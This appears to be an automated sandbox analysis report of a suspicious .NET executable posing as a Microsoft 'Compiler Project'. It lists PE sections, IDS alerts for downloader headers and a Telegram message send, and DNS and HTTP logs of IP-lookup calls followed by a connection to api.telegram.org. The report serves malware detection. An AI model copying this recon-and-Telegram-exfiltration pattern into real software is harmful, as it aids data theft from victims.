IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xbe066 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc0000 | 0x5cc | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc2000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xbc4cc | 0x70 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xbc0d0 | 0xbc200 | 90677abad87969dd10bb52689618b20a | False | 0.9098966985049833 | OpenPGP Public Key | 7.766159248335199 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xc0000 | 0x5cc | 0x600 | 4ff4c02944db9850ccb99516ab3ff4a8 | False | 0.4283854166666667 | data | 4.129833560060575 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xc2000 | 0xc | 0x200 | 7f63e4c3a8801110f878642f1300ebb6 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0xc0090 | 0x33c | data | | | 0.42995169082125606
RT_MANIFEST | 0xc03dc | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Description | Data
Translation | 0x0000 0x04b0
Comments |
CompanyName | Microsoft
FileDescription | Compiler Project
FileVersion | 1.0.0.0
InternalName | APWe.exe
LegalCopyright | Copyright 2022
LegalTrademarks |
OriginalFilename | APWe.exe
ProductName | Compiler Project
ProductVersion | 1.0.0.0
Assembly Version | 1.0.0.0
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-03-07T23:22:14.902436+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.9 | 49683 | 132.226.247.73 | 80 | TCP
2025-03-07T23:22:17.668241+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.9 | 49683 | 132.226.247.73 | 80 | TCP
2025-03-07T23:22:20.018057+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.9 | 49685 | 104.21.96.1 | 443 | TCP
2025-03-07T23:22:20.793056+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.9 | 49686 | 132.226.247.73 | 80 | TCP
2025-03-07T23:22:23.366202+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.9 | 49687 | 104.21.96.1 | 443 | TCP
2025-03-07T23:22:24.152430+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.9 | 49688 | 132.226.247.73 | 80 | TCP
2025-03-07T23:22:35.729444+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.9 | 49695 | 104.21.96.1 | 443 | TCP
2025-03-07T23:22:44.328853+0100 | 1810007 | Joe Security ANOMALY Telegram Send Message | 1 | 192.168.2.9 | 49700 | 149.154.167.220 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                Mar 7, 2025 23:22:20.749103069 CET49687443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:20.749140024 CET44349687104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:20.793056011 CET4968680192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:22.698744059 CET44349687104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:22.717120886 CET49687443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:22.717156887 CET44349687104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:23.366219044 CET44349687104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:23.366286039 CET44349687104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:23.366468906 CET49687443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:23.366934061 CET49687443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:23.370235920 CET4968680192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:23.371459007 CET4968880192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:23.376426935 CET8049686132.226.247.73192.168.2.9
                                                                                                                Mar 7, 2025 23:22:23.376492977 CET4968680192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:23.376624107 CET8049688132.226.247.73192.168.2.9
                                                                                                                Mar 7, 2025 23:22:23.376703978 CET4968880192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:23.376799107 CET4968880192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:23.381804943 CET8049688132.226.247.73192.168.2.9
                                                                                                                Mar 7, 2025 23:22:24.099194050 CET8049688132.226.247.73192.168.2.9
                                                                                                                Mar 7, 2025 23:22:24.100833893 CET49689443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:24.100876093 CET44349689104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:24.101002932 CET49689443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:24.101238012 CET49689443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:24.101249933 CET44349689104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:24.152430058 CET4968880192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:26.110598087 CET44349689104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:26.112711906 CET49689443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:26.112725973 CET44349689104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:26.616740942 CET44349689104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:26.616825104 CET44349689104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:26.616980076 CET49689443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:26.617479086 CET49689443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:26.622037888 CET4969080192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:26.627150059 CET8049690132.226.247.73192.168.2.9
                                                                                                                Mar 7, 2025 23:22:26.627248049 CET4969080192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:26.627370119 CET4969080192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:26.632487059 CET8049690132.226.247.73192.168.2.9
                                                                                                                Mar 7, 2025 23:22:27.313730955 CET8049690132.226.247.73192.168.2.9
                                                                                                                Mar 7, 2025 23:22:27.315298080 CET49691443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:27.315339088 CET44349691104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:27.315443039 CET49691443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:27.315707922 CET49691443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:27.315726995 CET44349691104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:27.355616093 CET4969080192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:29.103163958 CET44349691104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:29.105252028 CET49691443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:29.105279922 CET44349691104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:29.617763996 CET44349691104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:29.617822886 CET44349691104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:29.617913008 CET49691443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:29.618490934 CET49691443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:29.621407986 CET4969080192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:29.622390985 CET4969280192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:29.626656055 CET8049690132.226.247.73192.168.2.9
                                                                                                                Mar 7, 2025 23:22:29.626730919 CET4969080192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:29.627512932 CET8049692132.226.247.73192.168.2.9
                                                                                                                Mar 7, 2025 23:22:29.627594948 CET4969280192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:29.627748966 CET4969280192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:29.632797956 CET8049692132.226.247.73192.168.2.9
                                                                                                                Mar 7, 2025 23:22:30.329211950 CET8049692132.226.247.73192.168.2.9
                                                                                                                Mar 7, 2025 23:22:30.330738068 CET49693443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:30.330775976 CET44349693104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:30.330950975 CET49693443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:30.331140995 CET49693443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:30.331151962 CET44349693104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:30.371556997 CET4969280192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:32.110527039 CET44349693104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:32.112709999 CET49693443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:32.112726927 CET44349693104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:32.629187107 CET44349693104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:32.629264116 CET44349693104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:32.629559040 CET49693443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:32.629817963 CET49693443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:32.633152962 CET4969280192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:32.634377003 CET4969480192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:32.638446093 CET8049692132.226.247.73192.168.2.9
                                                                                                                Mar 7, 2025 23:22:32.638514996 CET4969280192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:32.639444113 CET8049694132.226.247.73192.168.2.9
                                                                                                                Mar 7, 2025 23:22:32.639508009 CET4969480192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:32.639667988 CET4969480192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:32.644870996 CET8049694132.226.247.73192.168.2.9
                                                                                                                Mar 7, 2025 23:22:33.338531971 CET8049694132.226.247.73192.168.2.9
                                                                                                                Mar 7, 2025 23:22:33.339919090 CET49695443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:33.339979887 CET44349695104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:33.340049028 CET49695443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:33.340353966 CET49695443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:33.340373993 CET44349695104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:33.386790037 CET4969480192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:35.228488922 CET44349695104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:35.230576992 CET49695443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:35.230609894 CET44349695104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:35.729443073 CET44349695104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:35.733230114 CET44349695104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:35.733359098 CET49695443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:35.733848095 CET49695443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:35.736671925 CET4969480192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:35.737725973 CET4969680192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:35.741877079 CET8049694132.226.247.73192.168.2.9
                                                                                                                Mar 7, 2025 23:22:35.742135048 CET4969480192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:35.742734909 CET8049696132.226.247.73192.168.2.9
                                                                                                                Mar 7, 2025 23:22:35.742886066 CET4969680192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:35.743067980 CET4969680192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:35.748044968 CET8049696132.226.247.73192.168.2.9
                                                                                                                Mar 7, 2025 23:22:36.444947958 CET8049696132.226.247.73192.168.2.9
                                                                                                                Mar 7, 2025 23:22:36.446410894 CET49697443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:36.446453094 CET44349697104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:36.446554899 CET49697443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:36.446825981 CET49697443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:36.446836948 CET44349697104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:36.496216059 CET4969680192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:38.169975042 CET44349697104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:38.171911955 CET49697443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:38.171931028 CET44349697104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:38.673763037 CET44349697104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:38.673880100 CET44349697104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:38.673965931 CET49697443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:38.674407005 CET49697443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:38.677532911 CET4969680192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:38.678845882 CET4969880192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:38.682780027 CET8049696132.226.247.73192.168.2.9
                                                                                                                Mar 7, 2025 23:22:38.682856083 CET4969680192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:38.683873892 CET8049698132.226.247.73192.168.2.9
                                                                                                                Mar 7, 2025 23:22:38.683947086 CET4969880192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:38.684065104 CET4969880192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:38.689075947 CET8049698132.226.247.73192.168.2.9
                                                                                                                Mar 7, 2025 23:22:39.366400957 CET8049698132.226.247.73192.168.2.9
                                                                                                                Mar 7, 2025 23:22:39.368201017 CET49699443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:39.368257999 CET44349699104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:39.368330002 CET49699443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:39.368592024 CET49699443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:39.368607998 CET44349699104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:39.418226004 CET4969880192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:41.142988920 CET44349699104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:41.145026922 CET49699443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:41.145051003 CET44349699104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:41.646987915 CET44349699104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:41.647049904 CET44349699104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:41.647119045 CET49699443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:41.647579908 CET49699443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:41.661726952 CET4969880192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:41.666973114 CET8049698132.226.247.73192.168.2.9
                                                                                                                Mar 7, 2025 23:22:41.667066097 CET4969880192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:41.671466112 CET49700443192.168.2.9149.154.167.220
                                                                                                                Mar 7, 2025 23:22:41.671499014 CET44349700149.154.167.220192.168.2.9
                                                                                                                Mar 7, 2025 23:22:41.671683073 CET49700443192.168.2.9149.154.167.220
                                                                                                                Mar 7, 2025 23:22:41.672135115 CET49700443192.168.2.9149.154.167.220
                                                                                                                Mar 7, 2025 23:22:41.672146082 CET44349700149.154.167.220192.168.2.9
                                                                                                                Mar 7, 2025 23:22:43.662491083 CET44349700149.154.167.220192.168.2.9
                                                                                                                Mar 7, 2025 23:22:43.662622929 CET49700443192.168.2.9149.154.167.220
                                                                                                                Mar 7, 2025 23:22:43.666152954 CET49700443192.168.2.9149.154.167.220
                                                                                                                Mar 7, 2025 23:22:43.666160107 CET44349700149.154.167.220192.168.2.9
                                                                                                                Mar 7, 2025 23:22:43.666366100 CET44349700149.154.167.220192.168.2.9
                                                                                                                Mar 7, 2025 23:22:43.667959929 CET49700443192.168.2.9149.154.167.220
                                                                                                                Mar 7, 2025 23:22:43.708353043 CET44349700149.154.167.220192.168.2.9
                                                                                                                Mar 7, 2025 23:22:44.328829050 CET44349700149.154.167.220192.168.2.9
                                                                                                                Mar 7, 2025 23:22:44.328887939 CET44349700149.154.167.220192.168.2.9
                                                                                                                Mar 7, 2025 23:22:44.328938961 CET49700443192.168.2.9149.154.167.220
                                                                                                                Mar 7, 2025 23:22:44.333023071 CET49700443192.168.2.9149.154.167.220
                                                                                                                Mar 7, 2025 23:22:49.549422979 CET4968880192.168.2.9132.226.247.73
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 7, 2025 23:22:13.676968098 CET | 53018 | 53 | 192.168.2.9 | 1.1.1.1
Mar 7, 2025 23:22:13.684921026 CET | 53 | 53018 | 1.1.1.1 | 192.168.2.9
Mar 7, 2025 23:22:14.943376064 CET | 49755 | 53 | 192.168.2.9 | 1.1.1.1
Mar 7, 2025 23:22:14.952323914 CET | 53 | 49755 | 1.1.1.1 | 192.168.2.9
Mar 7, 2025 23:22:41.662384987 CET | 50523 | 53 | 192.168.2.9 | 1.1.1.1
Mar 7, 2025 23:22:41.670660019 CET | 53 | 50523 | 1.1.1.1 | 192.168.2.9
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Mar 7, 2025 23:22:13.676968098 CET | 192.168.2.9 | 1.1.1.1 | 0x37e | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Mar 7, 2025 23:22:14.943376064 CET | 192.168.2.9 | 1.1.1.1 | 0x9d84 | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Mar 7, 2025 23:22:41.662384987 CET | 192.168.2.9 | 1.1.1.1 | 0x8c45 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Timestamp                          | Source IP | Dest IP     | Trans ID | Reply Code   | Name                | CName              | Address         | Type                   | Class       | DNS over HTTPS
Mar 7, 2025 23:22:13.684921026 CET | 1.1.1.1   | 192.168.2.9 | 0x37e    | No error (0) | checkip.dyndns.org  | checkip.dyndns.com |                 | CNAME (Canonical name) | IN (0x0001) | false
Mar 7, 2025 23:22:13.684921026 CET | 1.1.1.1   | 192.168.2.9 | 0x37e    | No error (0) | checkip.dyndns.com  |                    | 132.226.247.73  | A (IP address)         | IN (0x0001) | false
Mar 7, 2025 23:22:13.684921026 CET | 1.1.1.1   | 192.168.2.9 | 0x37e    | No error (0) | checkip.dyndns.com  |                    | 193.122.130.0   | A (IP address)         | IN (0x0001) | false
Mar 7, 2025 23:22:13.684921026 CET | 1.1.1.1   | 192.168.2.9 | 0x37e    | No error (0) | checkip.dyndns.com  |                    | 158.101.44.242  | A (IP address)         | IN (0x0001) | false
Mar 7, 2025 23:22:13.684921026 CET | 1.1.1.1   | 192.168.2.9 | 0x37e    | No error (0) | checkip.dyndns.com  |                    | 132.226.8.169   | A (IP address)         | IN (0x0001) | false
Mar 7, 2025 23:22:13.684921026 CET | 1.1.1.1   | 192.168.2.9 | 0x37e    | No error (0) | checkip.dyndns.com  |                    | 193.122.6.168   | A (IP address)         | IN (0x0001) | false
Mar 7, 2025 23:22:14.952323914 CET | 1.1.1.1   | 192.168.2.9 | 0x9d84   | No error (0) | reallyfreegeoip.org |                    | 104.21.96.1     | A (IP address)         | IN (0x0001) | false
Mar 7, 2025 23:22:14.952323914 CET | 1.1.1.1   | 192.168.2.9 | 0x9d84   | No error (0) | reallyfreegeoip.org |                    | 104.21.32.1     | A (IP address)         | IN (0x0001) | false
Mar 7, 2025 23:22:14.952323914 CET | 1.1.1.1   | 192.168.2.9 | 0x9d84   | No error (0) | reallyfreegeoip.org |                    | 104.21.80.1     | A (IP address)         | IN (0x0001) | false
Mar 7, 2025 23:22:14.952323914 CET | 1.1.1.1   | 192.168.2.9 | 0x9d84   | No error (0) | reallyfreegeoip.org |                    | 104.21.48.1     | A (IP address)         | IN (0x0001) | false
Mar 7, 2025 23:22:14.952323914 CET | 1.1.1.1   | 192.168.2.9 | 0x9d84   | No error (0) | reallyfreegeoip.org |                    | 104.21.112.1    | A (IP address)         | IN (0x0001) | false
Mar 7, 2025 23:22:14.952323914 CET | 1.1.1.1   | 192.168.2.9 | 0x9d84   | No error (0) | reallyfreegeoip.org |                    | 104.21.64.1     | A (IP address)         | IN (0x0001) | false
Mar 7, 2025 23:22:14.952323914 CET | 1.1.1.1   | 192.168.2.9 | 0x9d84   | No error (0) | reallyfreegeoip.org |                    | 104.21.16.1     | A (IP address)         | IN (0x0001) | false
Mar 7, 2025 23:22:41.670660019 CET | 1.1.1.1   | 192.168.2.9 | 0x8c45   | No error (0) | api.telegram.org    |                    | 149.154.167.220 | A (IP address)         | IN (0x0001) | false
• reallyfreegeoip.org
• api.telegram.org
• checkip.dyndns.org
Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
0          | 192.168.2.9 | 49683       | 132.226.247.73 | 80               | 7072 | C:\Users\user\Desktop\XFo9jVGyLQ.exe

Timestamp | Bytes transferred | Direction | Data (on the indented lines that follow)
Mar 7, 2025 23:22:13.696510077 CET | 151 | OUT
  GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
  Host: checkip.dyndns.org
  Connection: Keep-Alive
Mar 7, 2025 23:22:14.389657974 CET | 273 | IN
  HTTP/1.1 200 OK
  Date: Fri, 07 Mar 2025 22:22:14 GMT
  Content-Type: text/html
  Content-Length: 104
  Connection: keep-alive
  Cache-Control: no-cache
  Pragma: no-cache
  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Mar 7, 2025 23:22:14.653702974 CET | 127 | OUT
  GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
  Host: checkip.dyndns.org
Mar 7, 2025 23:22:14.861619949 CET | 273 | IN
  HTTP/1.1 200 OK
  Date: Fri, 07 Mar 2025 22:22:14 GMT
  Content-Type: text/html
  Content-Length: 104
  Connection: keep-alive
  Cache-Control: no-cache
  Pragma: no-cache
  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Mar 7, 2025 23:22:17.407529116 CET | 127 | OUT
  GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
  Host: checkip.dyndns.org
Mar 7, 2025 23:22:17.618110895 CET | 273 | IN
  HTTP/1.1 200 OK
  Date: Fri, 07 Mar 2025 22:22:17 GMT
  Content-Type: text/html
  Content-Length: 104
  Connection: keep-alive
  Cache-Control: no-cache
  Pragma: no-cache
  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
1          | 192.168.2.9 | 49686       | 132.226.247.73 | 80               | 7072 | C:\Users\user\Desktop\XFo9jVGyLQ.exe

Timestamp | Bytes transferred | Direction | Data (on the indented lines that follow)
Mar 7, 2025 23:22:20.077133894 CET | 127 | OUT
  GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
  Host: checkip.dyndns.org
Mar 7, 2025 23:22:20.747411966 CET | 273 | IN
  HTTP/1.1 200 OK
  Date: Fri, 07 Mar 2025 22:22:20 GMT
  Content-Type: text/html
  Content-Length: 104
  Connection: keep-alive
  Cache-Control: no-cache
  Pragma: no-cache
  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
2          | 192.168.2.9 | 49688       | 132.226.247.73 | 80               | 7072 | C:\Users\user\Desktop\XFo9jVGyLQ.exe

Timestamp | Bytes transferred | Direction | Data (on the indented lines that follow)
Mar 7, 2025 23:22:23.376799107 CET | 127 | OUT
  GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
  Host: checkip.dyndns.org
Mar 7, 2025 23:22:24.099194050 CET | 273 | IN
  HTTP/1.1 200 OK
  Date: Fri, 07 Mar 2025 22:22:23 GMT
  Content-Type: text/html
  Content-Length: 104
  Connection: keep-alive
  Cache-Control: no-cache
  Pragma: no-cache
  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


